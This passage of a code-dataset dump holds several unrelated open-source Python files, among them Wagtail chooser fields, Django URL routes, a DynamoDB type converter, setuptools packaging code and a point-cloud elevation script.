exist.'.format(value))\n\n def to_json(self, value):\n '''Converts the Python value to an equivalent JSON value (a value that can be passed to json.dump).'''\n if isinstance(value, self.model):\n return value.pk\n elif str(value).isdigit():\n return int(value)\n else:\n return None\n\n\nclass DocumentChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail document.'''\n @property\n def model(self):\n return get_document_model()\n\n @property\n def 
media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return Media(\n js=['wagtaildocs/js/document-chooser-modal.js',],\n css={\n 'all': []\n }\n )\n\n\nclass ImageChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail Image.'''\n @property\n def model(self):\n return get_image_model()\n\n @property\n def media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return Media(\n js=[\n 'wagtailimages/js/image-chooser-modal.js',\n ],\n css={\n 'all': []\n }\n )\n\nclass PageChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail Page.'''\n args_list = ModelChooserField.args_list + [\n 'target_model',\n 'can_choose_root',\n ]\n default_error_messages = {\n 'invalid-page': _('This page may not be chosen.'),\n }\n\n def __init__(self, target_model=None, can_choose_root=False, **kwargs):\n super().__init__(**kwargs)\n self._target_model = None\n if target_model:\n self._target_model = target_model\n\n self.can_choose_root = can_choose_root\n\n def validate(self, value):\n super().validate(value)\n\n if value and isinstance(value, Page):\n specific = value.specific\n if self.target_model and not isinstance(specific, self.target_model):\n raise ValidationError(self.error_messages['invalid-page'], code='invalid-page')\n\n if not self.can_choose_root and Site.objects.filter(root_page=value).exists():\n raise ValidationError(self.error_messages['invalid-page'], code='invalid-page')\n\n def get_args(self):\n args = super().get_args()\n if 'target_model' in args and args['target_model']:\n args['target_model'] = args['target_model']._meta.label\n return args\n\n @property\n def target_model(self):\n if isinstance(self._target_model, str):\n return resolve_model_string(self._target_model)\n return self._target_model\n\n @property\n def model(self):\n return Page\n\n @property\n def media(self):\n return Media(\n js=[\n 'wagtailadmin/js/page-chooser-modal.js',\n ]\n )","repo_name":"didorothy/wagtailaltstreamfield","sub_path":"altstreamfield/blocks/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":15800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"163922346","text":"\nfrom django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"following\", views.following, name=\"following\"),\n path(\"like/\",views.like, name=\"like\"),\n path(\"edit/\",views.edit, name=\"edit\"),\n path(\"follow/\", views.handle_follow, name = \"follow\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\")\n]\n","repo_name":"CMPSC297/project-4-1024","sub_path":"project-4-1024-newBranch/network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25590418534","text":"from cgi_simple import (\n div, ensure_valid_attributes_and_contents, flex_col, flex_row, flex_wrapper,\n labeled_text_input, text_input,\n)\n\ndef create_page():\n return flex_row({'class': 'third-page'}, [\n flex_col({'class': 'sidebar'}, [\n feats_summary(),\n proficiencies(),\n archetypes(),\n inventory(),\n flex_col([\n flex_wrapper(div({'class': 'section-header'}, 'Experience')),\n div(text_input({'name': 'experience'})),\n ]),\n flex_col([\n flex_wrapper(div({'class': 'section-header'}, 'Wealth')),\n div(text_input({'name': 'wealth'})),\n ]),\n ]),\n flex_col({'class': 'main-body'}, [\n equipment(),\n abilities_summary(),\n personality(),\n ]),\n ])\n\ndef feats_summary():\n return flex_col({'class': 'feats-summary'}, [\n flex_row({'class': 'summary-header'}, [\n div({'class': 'summary-header-level section-header'}, 'Lvl'),\n div({'class': 'summary-header-name section-header'}, 'Feats'),\n ]),\n \"\".join([feat_row(i) for i in [1, 2, 5, 9]]),\n ])\n\ndef abilities_summary():\n return flex_col({'class': 'abilities'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Abilities')),\n *[\n flex_row([\n labeled_text_input('Name', {'class': 'ability-name'}, input_attributes={\n 'name': f'ability_name_{i}',\n }),\n labeled_text_input('Effects', {'class': 'ability-effects'}, input_attributes={\n 'name': f'ability_effects_{i}',\n }),\n ])\n for i in range(10)\n ],\n ])\n\ndef feat_row(level):\n return flex_row({'class': 'summary-row'}, [\n div({'class': 'summary-row-level'}, text_input({\n 'disabled': True,\n 'name': f\"feat_level_{level}\",\n 'value': level,\n })),\n div({'class': 'summary-row-name'}, text_input({'name': f\"feat_name_{level}\"})),\n ])\n\ndef proficiencies():\n return flex_col({'class': 'proficiencies'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Proficiencies')),\n labeled_text_input('Armor', input_attributes={'name': 'prof_armor'}),\n text_input({'name': 'armor_proficiencies'}),\n labeled_text_input('Weapons', input_attributes={'name': 'weapon_proficiencies_1'}),\n text_input({'name': 'weapon_proficiencies_2'}),\n labeled_text_input('Languages', input_attributes={'name': 'language_proficiencies'}),\n ])\n\ndef subsection_header(attributes=None, contents=None):\n attributes, contents = ensure_valid_attributes_and_contents(attributes, contents)\n attributes['class'] = 'subsection-header ' + attributes.get('class', '')\n return flex_col(attributes, contents)\n\ndef equipment():\n return flex_col({'class': 'equipment'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Equipment')),\n *[\n flex_row([\n labeled_text_input('Name', {'class': 'equipment-name'}, {'name': f'equipment_name_{i}'}),\n labeled_text_input('Effects', {'class': 'equipment-effects'}, {'name': 
f'equipment_effects_{i}'}),\n ])\n for i in range(5)\n ],\n ])\n\ndef archetypes():\n return div({'class': 'inventory'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Archetypes')),\n *[\n text_input({'name': f\"archetypes_{i}\"}) for i in range(4)\n ]\n ])\n\ndef inventory():\n return div({'class': 'inventory'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Inventory')),\n *[\n text_input({'name': f\"inventory_{i}\"}) for i in range(13)\n ]\n ])\n\ndef misc_equipment(body_slot, body_slot_html=None):\n if body_slot_html is None:\n body_slot_html = body_slot.lower()\n return flex_row({'class': body_slot_html}, [\n subsection_header(body_slot),\n labeled_text_input('Name', {'class': 'equipment-name'}, {'name': body_slot_html + '-name'}),\n labeled_text_input('Special', {'class': 'equipment-special'}, {'name': body_slot_html + '-special'}),\n ])\n\ndef personality():\n return flex_col({'class': 'personality'}, [\n div({'class': 'section-header'}, 'Alignment and Deity'),\n div(text_input({'name': 'alignment_and_deity'})),\n div({'class': 'section-header'}, 'Personality and Background'),\n \"\".join([div(text_input({'name': f'personality_and_background_{i}'})) for i in range(5)]),\n div({'class': 'section-header goals-and-flaws'}, 'Goals and Flaws'),\n \"\".join([div(text_input({'name': f'goals_and_flaws_{i}'})) for i in range(2)]),\n ])\n","repo_name":"grantrobertsmith/Rise","sub_path":"character_sheet/third_page.py","file_name":"third_page.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17813996981","text":"import csv\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterable, List\n\nDictRow = Dict[str, Any]\n\n\ndef read_tsv(filename: Path, named_columns: bool = True) -> List[DictRow]:\n \"\"\"Read a named or unnamed tsv file and return a list of row dicts\"\"\"\n result = []\n with open(filename, \"r\", encoding=\"utf-8\") as csvfile:\n if named_columns:\n for dict_row in csv.DictReader(csvfile, delimiter=\"\\t\"):\n result.append(dict_row)\n else:\n for row in csv.reader(csvfile, delimiter=\"\\t\"):\n result.append(dict(enumerate(row)))\n return result\n\n\ndef write_tsv(filename: Path, data: List[DictRow]) -> None:\n \"\"\"Write a named tsv file\"\"\"\n with open(filename, \"w\", encoding=\"utf-8\") as csvfile:\n writer = csv.DictWriter(\n csvfile, fieldnames=list(data[0].keys()), delimiter=\"\\t\"\n )\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\n\ndef select_columns(\n data: Iterable[DictRow], column_ids: List[str]\n) -> List[List[DictRow]]:\n \"\"\"Select list of \"columns\" from a list of dicts\"\"\"\n columns: List[List[DictRow]] = [[] for _ in column_ids]\n for item in data:\n for column, column_id in zip(columns, column_ids):\n column.append(item[column_id])\n return columns\n\n\ndef join_lists_of_dicts(*inputs: Iterable[DictRow]) -> List[DictRow]:\n \"\"\"Loop through several lists of dicts and join the corresponding elements\"\"\"\n results = []\n for items in zip(*inputs):\n results.append({k: v for item in items for k, v in item.items()})\n return results\n","repo_name":"facebookresearch/stopes","sub_path":"stopes/eval/alti/alti_metrics/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"72"} +{"seq_id":"2027925654","text":"# Problem description\n# Given a string my_string and integers num1 and num2 as parameters, \n# complete the solution function so that it returns my_string with the\n# characters at index num1 and index num2 swapped.\n\n# Constraints\n\n# 1 < length of my_string < 100\n# 0 ≤ num1, num2 < length of my_string\n# my_string consists of lowercase letters.\n# num1 ≠ num2\n\n# Examples\n# my_string \tnum1 \tnum2 \tresult\n# \"hello\" \t1 \t2 \t\"hlelo\"\n# \"I love you\" \t3 \t6 \t\"I l veoyou\"\n\ndef solution(my_string, num1, num2):\n answer = ''\n my_string = list(my_string)\n my_string[num1], my_string[num2] = my_string[num2], my_string[num1]\n return answer.join(my_string)\n\n# Line 3: my_string is a string, so convert it to a list first.\n# Line 4: swap the characters at index num1 and index num2.\n# Line 5: join the swapped list back into a string with join() and return it.","repo_name":"oiosu/Programmers_Python","sub_path":"프로그래머스_Level 0/50_인덱스 구하기.py","file_name":"50_인덱스 구하기.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41634544064","text":"from visual import display, set_cursor\nimport platform\n\n# ViewPort, a subclass of cvisual.display, is provided as a way to override certain\n# display methods related to mouse event handling, when it comes to interacting with \n# the scene elements (zoom, rotations etc...)\nclass ViewPort(display):\n def __init__(self, **keywords):\n # invoke normal display constructor ...\n super(ViewPort, self).__init__(**keywords)\n\n # ... and add a little more information:\n # Indicates when an animation automatically zooms in and pans around a focus point\n self._auto_movement = False \n self.plat = platform.system()\n\n def getDisplay(self):\n return super\n\n # method to change the status of _auto_movement\n def _set_autoMovement(self, is_movement):\n self._auto_movement = is_movement\n if is_movement == False:\n self._resetMouse()\n\n def _resetMouse(self):\n self._mt.leftIsDown = self._mt.rightIsDown = self._mt.middleIsDown = 0\n self._mt.lastSpinning = self._mt.lastZooming = 0\n self._mt.macCtrl = 0\n\n def _report_mouse_state(self, evt, defx=20, defy=20): # wx gives x,y relative to upper left corner\n # this method is directly taken from the display class and modified to get the desired effect\n x, y = defx, defy\n if evt != None:\n x, y = evt.GetPosition()\n\n if self._lastx is None:\n self._lastx = x\n self._lasty = y\n\n zooming = self._mt.isZooming(evt, self.userzoom, self.userspin)\n spinning = self._mt.isSpinning(evt, self.userzoom, self.userspin, zooming)\n lock = self._mt.checkLock(spinning, zooming)\n \n if lock and not self._captured:\n self.cursor_state = self.cursor.visible\n set_cursor(self.canvas, False)\n if self.fillswindow:\n self._cursorx, self._cursory = (x, y)\n else:\n # cursor is based on (0,0) of the window; our (x,y) is based on (0,0) of the 3D display\n self._cursorx, self._cursory = (int(self._x)+x, int(self._y)+y)\n self._canvas.CaptureMouse()\n self._captured = True\n elif self._captured and not (spinning or zooming):\n self.win.WarpPointer(self._cursorx, self._cursory)\n self._lastx = x = self._cursorx\n self._lasty = y = self._cursory\n set_cursor(self.canvas, self.cursor_state)\n self._canvas.ReleaseMouse() \n self._captured = False\n \n \n #\n # So... we're going to report left/right/middle\n #\n\n left = self._mt.leftIsDown and not spinning and not zooming\n right = spinning or self._mt.rightIsDown\n middle = zooming or self._mt.middleIsDown\n shift = evt.ShiftDown()\n ctrl = evt.ControlDown()\n alt = evt.AltDown()\n cmd = evt.CmdDown()\n \n if self.plat == 'Macintosh' and ctrl and cmd:\n #\n # Weird... if the user holds the cmd key, evt.ControlDown() returns True even if it's a lie.\n # So... 
we don't know if it's *really* down or not. ;-(\n #\n ctrl = False\n \n# labels = [s.strip() for s in \"x, y, left, middle, right, shift, ctrl, alt, cmd, spin, zoom, lock, cap\".split(',')]\n# vals = (x, y, left, middle, right, shift, ctrl, alt, cmd, spinning, zooming, lock, self._captured)\n# fmts = [\"%9s\"]*len(vals)\n# for l,f in zip(labels,fmts):\n# print(f % l, end='')\n# print()\n# for v,f in zip(vals,fmts):\n# print(f % `v`, end='')\n# print()\n## if trigger == 'leftdown' and not self._rightdown:\n## if ctrl:\n## right = 1\n## left = 0\n## elif alt:\n## middle = 1\n## left = 0\n\n# if (spinning or zooming) and (x == self._lastx) and (y == self._lasty): return\n\n # CM: whenever there is an auto_movement, do not call report_mouse_state as it \n # could interfer with camera methods that also call the \"report_mouse_state\"\n # from the display class \n\n if self._auto_movement == True:\n self._resetMouse()\n return \n\n self.report_mouse_state([left, right, middle],\n self._lastx, self._lasty, x, y,\n [shift, ctrl, alt, cmd])\n\n\n # For some reason, handling spin/zoom in terms of movements away\n # from a fixed cursor position fails on the Mac. As you drag the\n # mouse, repeated move mouse events mostly give the fixed cursor position.\n # Hence, for now, dragging off-screen stops spin/zoom on the Mac.\n # Similar problems on Ubuntu 12.04, plus wx.CURSOR_BLANK not available on Linux.\n \n if (spinning or zooming) and (self.plat != 'Macintosh'): # reset mouse to original location\n self.win.WarpPointer(self._cursorx, self._cursory)\n if self.fillswindow:\n self._lastx = self._cursorx\n self._lasty = self._cursory\n else:\n # cursor is based on (0,0) of the window; our (x,y) is based on (0,0) of the 3D display\n self._lastx = self._cursorx - int(self._x)\n self._lasty = self._cursory - int(self._y)\n else: \n self._lastx = x\n self._lasty = y\n \n\n\nclass Color:\n black = (0,0,0)\n white = (1,1,1)\n whiteish = (0.9, 0.9, 0.9)\n grey = (0.5,0.5,0.5)\n deepgrey = (0.32, 0.32, 0.32)\n darkgrey = (0.04, 0.04, 0.04)\n lightgrey = (0.75,0.75,0.75)\n\n red = (1,0,0)\n redish = (0.5, 0, 0)\n green = (0,1,0)\n greenish = (0, 0.5, 0)\n blue = (0,0,1)\n blueish = (0, 0, 0.5)\n darkblue = (0, 0, 0.2)\n\n yellow = (1,1,0)\n yellowish = (0.5, 0.5, 0)\n cyan = (0,1,1)\n cyanish = (0, 0.5, 0.5)\n magenta = (1,0,1)\n magentish = (0.5, 0, 0.5)\n dirtyYellow = (0.5,0.5,0)\n orange = (1,0.6,0)\n #nightshade = (0.12, 0.12, 0.12)\n nightshade = (0.05, 0.05, 0.05)\n\n","repo_name":"crmathieu/Orbital","sub_path":"celestial/vpython_interface.py","file_name":"vpython_interface.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20184973737","text":"# -*- coding: utf-8 -*-\nimport logging\nimport ast\nfrom .sql.common import Functions\nfrom datetime import datetime, date\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, Dict, Optional, Set, List, Union, Type\n\n_logger = logging.getLogger(__name__) # type: ignore\n\n\nclass Serializer(metaclass=ABCMeta):\n def __init__(\n self,\n mapping: Optional[Dict[Any, Callable[[Optional[str]], Optional[Any]]]] = None,\n ) -> None:\n if mapping is None:\n self._mapping = self.get_default_converters()\n else:\n self._mapping = mapping\n\n @property\n def mapping(self) -> Dict[str, Callable[[Optional[str]], Optional[Any]]]:\n return self._mapping\n\n def _to_string(self, value: Optional[str], **kwargs) -> Optional[Dict[str, str]]:\n if value is 
None:\n return None\n return {\"S\": value}\n\n def _to_number(\n self, value: Optional[Union[int, float]], **kwargs\n ) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n return {\"N\": str(value)}\n\n def _to_binary(self, value: Optional[bytes], **kwargs) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n return {\"B\": value.decode()}\n\n def _to_set(\n self, value: Optional[Set[Any]], **kwargs\n ) -> Optional[Dict[str, List[str]]]:\n if value is None:\n return None\n\n value_ = next(iter(value))\n if isinstance(value_, type(1)) or isinstance(value_, type(1.0)):\n return {\"NS\": [str(v) for v in value]}\n elif isinstance(value_, type(b\"\")):\n return {\"BS\": [v.decode() for v in value]}\n else:\n return {\"SS\": [v for v in value]}\n\n def _to_map(\n self, value: Optional[Dict[str, Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = {}\n for k, v in value.items():\n type_ = type(v)\n converted_[k] = self._mapping.get(type_, None)(v)\n return {\"M\": converted_}\n\n def _to_list(\n self, value: Optional[List[Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = []\n for v in value:\n type_ = type(v)\n converted_.append(self._mapping.get(type_, None)(v))\n return {\"L\": converted_}\n\n def _to_null(self, value: Optional[Any], **kwargs) -> Optional[Dict[str, Any]]:\n return {\"NULL\": False if value else True}\n\n def _to_bool(self, value: Optional[bool], **kwargs) -> Optional[Dict[str, Any]]:\n return {\"BOOL\": value}\n\n def _to_datetime(\n self, value: Optional[Union[datetime, date]], **kwargs\n ) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n\n return {\"S\": value.isoformat()}\n\n def _to_default(self, value: Optional[Any], **kwargs) -> Optional[str]:\n return {\"S\": str(value)}\n\n def get(self, type_: Type) -> Callable[[Optional[str]], Optional[Any]]:\n return self._mapping.get(type_, self._to_default)\n\n def get_default_converters(\n self,\n ) -> Dict[Type[Any], Callable[[Optional[str]], Optional[Any]]]:\n return {\n str: self._to_string,\n int: self._to_number,\n float: self._to_number,\n bytes: self._to_binary,\n set: self._to_set,\n dict: self._to_map,\n list: self._to_list,\n type(None): self._to_null,\n bool: self._to_bool,\n datetime: self._to_datetime,\n date: self._to_datetime,\n }\n\n\nclass Deserializer(metaclass=ABCMeta):\n def __init__(\n self,\n mapping: Optional[Dict[Any, Callable[[Optional[str]], Optional[Any]]]] = None,\n ) -> None:\n if mapping is None:\n self._mapping = self.get_default_converters()\n else:\n self._mapping = mapping\n\n @property\n def mapping(self) -> Dict[str, Callable[[Optional[str]], Optional[Any]]]:\n return self._mapping\n\n def _to_string(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n function_ = kwargs.get(\"function\", None)\n\n if function_ == Functions.DATE:\n return self._to_date(value, **kwargs)\n elif function_ == Functions.DATETIME:\n return self._to_datetime(value, **kwargs)\n else:\n return value\n\n def _to_date(self, value: Optional[Any], **kwargs) -> Optional[datetime]:\n function_params_ = kwargs.get(\"function_params\", None)\n if function_params_ is None or len(function_params_) == 0:\n return date.fromisoformat(value)\n else:\n return datetime.strptime(value, function_params_[0]).date()\n\n def _to_datetime(self, value: Optional[Any], **kwargs) -> Optional[datetime]:\n function_params_ = kwargs.get(\"function_params\", None)\n if function_params_ is None or 
len(function_params_) == 0:\n return datetime.fromisoformat(value)\n else:\n return datetime.strptime(value, function_params_[0])\n\n def _to_number(self, value: Optional[str], **kwargs) -> Optional[Union[int, float]]:\n if value is None:\n return None\n return ast.literal_eval(value)\n\n def _to_binary(self, value: Optional[str], **kwargs) -> Optional[bytes]:\n if value is None:\n return None\n return value\n\n def _to_string_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[str]]:\n if value is None:\n return None\n return set([v for v in value])\n\n def _to_number_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[float]]:\n if value is None:\n return None\n return set([float(v) for v in value])\n\n def _to_binary_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[bytes]]:\n if value is None:\n return None\n return set([v for v in value])\n\n def _to_map(\n self, value: Optional[Dict[str, Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = {}\n for k, v in value.items():\n type_, value_ = next(iter(v.items()))\n # fall back to _to_default so unknown type tags don't raise TypeError\n converted_[k] = self._mapping.get(type_, self._to_default)(value_)\n return converted_\n\n def _to_list(self, value: Optional[List[Any]], **kwargs) -> Optional[List[Any]]:\n if value is None:\n return None\n\n converted_ = []\n for v in value:\n type_, value_ = next(iter(v.items()))\n converted_.append(self._mapping.get(type_, self._to_default)(value_))\n return converted_\n\n def _to_null(self, value: Optional[bool], **kwargs) -> Optional[bool]:\n return value\n\n def _to_bool(self, value: Optional[bool], **kwargs) -> Optional[bool]:\n return value\n\n def _to_default(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n return value\n\n def get(self, type_: str) -> Callable[[Optional[str]], Optional[Any]]:\n return self._mapping.get(type_, self._to_default)\n\n def get_default_converters(\n self,\n ) -> Dict[Any, Callable[[Optional[str]], Optional[Any]]]:\n return {\n \"S\": self._to_string,\n \"N\": self._to_number,\n \"B\": self._to_binary,\n \"SS\": self._to_string_set,\n \"NS\": self._to_number_set,\n \"BS\": self._to_binary_set,\n \"M\": self._to_map,\n \"L\": self._to_list,\n \"NULL\": self._to_null,\n \"BOOL\": self._to_bool,\n }\n\n\nclass Converter(metaclass=ABCMeta):\n def __init__(\n self,\n serializer: Serializer,\n deserializer: Deserializer,\n ) -> None:\n self._serializer = serializer\n self._deserializer = deserializer\n\n @property\n def serializer(self) -> Serializer:\n return self._serializer\n\n @property\n def deserializer(self) -> Deserializer:\n return self._deserializer\n\n def get_serialize_converter(\n self, type_: str\n ) -> Callable[[Optional[str]], Optional[Any]]:\n return self._serializer.get(type_)\n\n def get_deserialize_converter(\n self, type_: str\n ) -> Callable[[Optional[str]], Optional[Any]]:\n return self._deserializer.get(type_)\n\n @abstractmethod\n def serialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n raise NotImplementedError # pragma: no cover\n\n @abstractmethod\n def deserialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n raise NotImplementedError # pragma: no cover\n\n\nclass DefaultTypeConverter(Converter):\n def __init__(self) -> None:\n super().__init__(\n serializer=Serializer(),\n deserializer=Deserializer(),\n )\n\n def serialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n type_ = type(value)\n converter = self.get_serialize_converter(type_)\n return converter(value, **kwargs)\n\n def 
deserialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n type_, value_ = next(iter(value.items()))\n converter = self.get_deserialize_converter(type_)\n return converter(value_, **kwargs)\n","repo_name":"passren/PyDynamoDB","sub_path":"pydynamodb/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"17504353855","text":"\"\"\"Extensions to the 'distutils' for large or complex distributions\"\"\"\nfrom setuptools.extension import Extension, Library\nfrom setuptools.dist import Distribution, Feature, _get_unpatched\nimport distutils.core, setuptools.command\nfrom setuptools.depends import Require\nfrom distutils.core import Command as _Command\nfrom distutils.util import convert_path\nimport os\nimport sys\n\n__version__ = '0.6'\n__all__ = [\n 'setup', 'Distribution', 'Feature', 'Command', 'Extension', 'Require',\n 'find_packages'\n]\n\n# This marker is used to simplify the process that checks is the\n# setuptools package was installed by the Setuptools project\n# or by the Distribute project, in case Setuptools creates\n# a distribution with the same version.\n#\n# The distribute_setup script for instance, will check if this\n# attribute is present to decide whether to reinstall the package\n# or not.\n_distribute = True\n\nbootstrap_install_from = None\n\n# If we run 2to3 on .py files, should we also convert docstrings?\n# Default: yes; assume that we can detect doctests reliably\nrun_2to3_on_doctests = True\n# Standard package names for fixer packages\nlib2to3_fixer_packages = ['lib2to3.fixes']\n\ndef find_packages(where='.', exclude=()):\n \"\"\"Return a list all Python packages found within directory 'where'\n\n 'where' should be supplied as a \"cross-platform\" (i.e. URL-style) path; it\n will be converted to the appropriate local path syntax. 'exclude' is a\n sequence of package names to exclude; '*' can be used as a wildcard in the\n names, such that 'foo.*' will exclude all subpackages of 'foo' (but not\n 'foo' itself).\n \"\"\"\n out = []\n stack=[(convert_path(where), '')]\n while stack:\n where,prefix = stack.pop(0)\n for name in os.listdir(where):\n fn = os.path.join(where,name)\n if ('.' 
not in name and os.path.isdir(fn) and\n os.path.isfile(os.path.join(fn,'__init__.py'))\n ):\n out.append(prefix+name); stack.append((fn,prefix+name+'.'))\n for pat in list(exclude)+['ez_setup', 'distribute_setup']:\n from fnmatch import fnmatchcase\n out = [item for item in out if not fnmatchcase(item,pat)]\n return out\n\nsetup = distutils.core.setup\n\n_Command = _get_unpatched(_Command)\n\nclass Command(_Command):\n __doc__ = _Command.__doc__\n\n command_consumes_arguments = False\n\n def __init__(self, dist, **kw):\n # Add support for keyword arguments\n _Command.__init__(self,dist)\n for k,v in kw.items():\n setattr(self,k,v)\n\n def reinitialize_command(self, command, reinit_subcommands=0, **kw):\n cmd = _Command.reinitialize_command(self, command, reinit_subcommands)\n for k,v in kw.items():\n setattr(cmd,k,v) # update command with keywords\n return cmd\n\nimport distutils.core\ndistutils.core.Command = Command # we can't patch distutils.cmd, alas\n\ndef findall(dir = os.curdir):\n \"\"\"Find all files under 'dir' and return the list of full filenames\n (relative to 'dir').\n \"\"\"\n all_files = []\n for base, dirs, files in os.walk(dir):\n if base==os.curdir or base.startswith(os.curdir+os.sep):\n base = base[2:]\n if base:\n files = [os.path.join(base, f) for f in files]\n all_files.extend(filter(os.path.isfile, files))\n return all_files\n\nimport distutils.filelist\ndistutils.filelist.findall = findall # fix findall bug in distutils.\n\n# sys.dont_write_bytecode was introduced in Python 2.6.\nif ((hasattr(sys, \"dont_write_bytecode\") and sys.dont_write_bytecode) or\n (not hasattr(sys, \"dont_write_bytecode\") and os.environ.get(\"PYTHONDONTWRITEBYTECODE\"))):\n _dont_write_bytecode = True\nelse:\n _dont_write_bytecode = False\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"services/collaboration/komob-server/lib/python2.6/site-packages/distribute-0.6.14-py2.6.egg/setuptools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"12667233517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 14 15:30:53 2019\n\n@author: alien\n\"\"\"\n\nimport numpy as np\n\nfrom sklearn.neighbors import KDTree\n\nfrom skimage.measure import label\nfrom skimage.transform import resize\n\n# Import functions to read and write ply files\nfrom utils.ply import write_ply, read_ply\n\nimport time\n\nimport matplotlib.pyplot as plt\n\nfrom alienlab import *\n\nimport scipy.ndimage.morphology as morpho\nimport skimage.morphology as skmorpho\n\nfrom progressbar import ProgressBar\n#%%\n# ------------------------------------------------------------------------------------------\n#\n# Functions\n# \\***************/\n\nbar = ProgressBar()\n\n \ndef get_elevation(cloud, kx, ky):\n '''\n Generate the elevation images from the point cloud\n Inputs: 3D cloud [stack of arrays]: list of positions x,y,z, and other attributes are acceptable\n ks, ky [float] parameter for height to voxel conversion\n \n Outputs: elevation images: array of at least 4 images:\n minimal elevation, maximal elevation, range, accumulation\n and if provided class and labels of the projected points\n reverse projection: list of tuples containing \n -the set of points projected onto each voxel,\n -among those, points whose elevation is lower then 5mm above minimal elevation\n -maximal elevation below 5mm of maximal elevation\n \n '''\n\n points = np.copy(cloud)\n #point cloud limits\n 
point_cloud_max = np.max(points, 0)\n point_cloud_min = np.min(points, 0)\n \n #conversion into voxel limits\n x_max = (point_cloud_max[0]/kx).astype(int)\n x_min = (point_cloud_min[0]/kx).astype(int)\n \n y_max = (point_cloud_max[1]/ky).astype(int)\n y_min = (point_cloud_min[1]/ky).astype(int)\n \n #outputs to fill\n elevation_image = []\n reverse_projection = []\n \n points_vox = np.copy(points)\n #Assignment to voxel values\n points_vox[:,0] = (points[:,0]/kx).astype(int)\n points_vox[:,1] = (points[:,1]/ky).astype(int)\n \n #minimal elevation of the point cloud\n zmin = point_cloud_min[2]\n \n #Scan the xy grid to update the elevation images\n #Could probably be faster with np.unique which I discovered later on...\n for x in bar(range(x_min, x_max)):\n x_ind = points_vox[:,0] == x\n points_x = points[x_ind]\n P_locx = points_vox[x_ind]\n val_ind = np.where(x_ind)[0]\n \n for y in range(y_min, y_max):\n y_ind = P_locx[:,1] == y\n points_y = points_x[y_ind] \n \n if len(points_y) != 0:\n val_ind2 = val_ind[y_ind]\n #maximal elevation \n maxi = np.max(points_y[:,2])\n #minimal elevation\n mini = np.min(points_y[:,2])\n \n #Points with close minimal or maximal elevation (especially minimal for ground assignment)\n eps = 0.05\n ind_max = val_ind2[np.abs(points_y[:, 2]-maxi) < eps]\n ind_min = val_ind2[np.abs(points_y[:, 2] - mini) < eps]\n \n if cloud.shape[1] == 3: #point cloud x, y, z\n \n elevation_image.append([x, y, maxi-zmin, mini-zmin, \n maxi - mini, len(points_y)])\n else: #point cloud x, y, z, label, class\n elevation_image.append([x, y, maxi-zmin, mini-zmin, maxi - mini, \n len(points_y), points[ind_max[0], -2], points[ind_max[0], -1]])\n \n reverse_projection.append((val_ind2, ind_max, ind_min))\n return np.array(elevation_image), reverse_projection\n\n \ndef region_criterion(P1, P2, lbd): \n '''Selection criterion for ground region growth\n inputs: P1 [array]: image patch neighbour of the seed\n P2 [float]: elevation of the seed\n lbd [float]: difference of elevation constraint\n ''' \n crit = (np.abs(P1-P2) < lbd) * (P1 != 0) \n return crit\n\n\ndef lambda_flat2(im, r = 25, C1 = 2):\n '''Region growth to detect the ground'''\n Lx, Ly = im.shape\n \n aux = np.copy(im)\n #Set the background to maximal value to avoid including it in the region growth\n aux[im == 0] = np.max(im)\n #Initial seed should be in the ground, highly probable if taken among the \n #points with an elevation around 0% of the elevation 